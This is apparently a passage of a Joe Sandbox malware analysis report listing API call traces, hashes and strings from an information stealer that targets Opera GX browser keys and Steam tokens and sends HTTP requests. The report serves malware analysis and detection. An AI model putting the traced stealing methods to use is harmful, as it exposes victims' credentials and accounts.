                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A069D8
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A185C2
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3086566538-2579291623
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 06c1515dff6fa05ddc9a0a14c4eb4aac360cc8af4ee0ba09daa78eb36824fe97
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aa308d36dd16028d77c51a952189c0e137eb0a3c7d476eff459f8bdb73718b52
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c1515dff6fa05ddc9a0a14c4eb4aac360cc8af4ee0ba09daa78eb36824fe97
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8016D71D80258ABDB10FB75EE85A8D37AAAF44360B400561ED24A3251EF34EA098ED1
                                                                                                                                                                                                                                                                                                                                                          Function 02A18BE6 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?), ref: 02A18C4D
                                                                                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4198075804-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: afdeb248de92ce72fa0d7ae36c86f146ae309291979c044b5fc970f9f1f2cfb8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6eec95f7d2426fdfbb631a8f5b0b504ff622bd54fb08d47768ec7deac4b59f55
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afdeb248de92ce72fa0d7ae36c86f146ae309291979c044b5fc970f9f1f2cfb8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37212576841119ABEF01EF55ED849DE7BBAEF44364B044226FE05A3110DB74AA8ACF90
                                                                                                                                                                                                                                                                                                                                                          Function 02A1428C Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,02A167CA), ref: 02A142A6
                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,02A167CA,02A167CA,00000000,?,?,?,02A167CA), ref: 02A142CD
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02A167CA), ref: 02A142E4
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1065093856-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ac43277408539aa9036dc76eced2badf6699d13a8a978f884aa91bfecf1665e4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 92b35086ea10365707114a6691feb037eff8d9cae89dda66950df53e0b8bcd51
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac43277408539aa9036dc76eced2badf6699d13a8a978f884aa91bfecf1665e4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9F09075540218BFDB005FA8DC86FEB7BACEF053A4F004621FD0197180DB619D919BE1
                                                                                                                                                                                                                                                                                                                                                          Function 02A13EE1 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,02A15B27,00000000,?), ref: 02A13F03
                                                                                                                                                                                                                                                                                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02A13F1E
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A13F25
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3e31c9a879e63947e68f0834ff79a6d7de64ebb8f8047a8071920edbeabc461d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 84279aca799dfa48ab5ae8b332be32f06ac89744b2e4f22a6aa081fa06a5c2f9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e31c9a879e63947e68f0834ff79a6d7de64ebb8f8047a8071920edbeabc461d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F09035A80118ABD710AB68DC45FEE77B8AF45710F000456BE44D7180CFB0E9858B91
                                                                                                                                                                                                                                                                                                                                                          Function 02A128E1 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01375), ref: 02A128ED
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A128F4
                                                                                                                                                                                                                                                                                                                                                          • GetComputerNameA.KERNEL32(00000000,02A01375), ref: 02A12908
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1664310425-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 60d5612f9780f1e5a1df38f013800b42661f2abc303485f59651a9e65d078ca5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3a3ae63981a46830fdc17754bb551ab20b789c8c2ceb14893a832c9602909040
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60d5612f9780f1e5a1df38f013800b42661f2abc303485f59651a9e65d078ca5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFE0E6B5740244BBD7015B9A9C4DF9B76ACDB85765F100465F605D3140DEB0D9558620
                                                                                                                                                                                                                                                                                                                                                          Function 02A0D8E5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 314COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX,02A37926,02A37913,?,?,?), ref: 02A0D918
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A139EE: GetFileAttributesA.KERNEL32(?,?,?,02A0EA72,?,?,?), ref: 02A139F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A093A4: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 02A093EE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A093A4: lstrlen.KERNEL32(00000001,?,?,?,?,?,?), ref: 02A0947F
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrcatlstrlen$AttributesFileFolderPath
                                                                                                                                                                                                                                                                                                                                                          • String ID: Opera GX
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 729072150-3280151751
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 617fe49af4a853afe8f9c7632822a101b952111d14bc4455ea81976d686b79f9
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b86800087ca395ce1eb3c5c9a0a875ae2577bba07b3d1409d6b05fc9559d94a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 617fe49af4a853afe8f9c7632822a101b952111d14bc4455ea81976d686b79f9
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99C1D632D80129AADF11FBB4EE86ACDB776AF04310F510121EE0477190DE71AF5A8F92
                                                                                                                                                                                                                                                                                                                                                          Function 02A07A3B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,02A07B86,?), ref: 02A07ABA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 544645111-3916222277
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 77774378c9b0534f847178553774d4bd8525b3129e501a0cfec8ce9ba65a55d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c8cba6bbf86398fd290540fc725e0a0a92ce16ef8d476230758bdbafba7c059d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77774378c9b0534f847178553774d4bd8525b3129e501a0cfec8ce9ba65a55d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C11667161020AAFDB20CF96EDC4BA9F7F4FB08388F144454A542D62C0EB74BB54DB61
                                                                                                                                                                                                                                                                                                                                                          Function 02A18D06 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A18D4D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • Soft\Steam\steam_tokens.txt, xrefs: 02A18D5D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
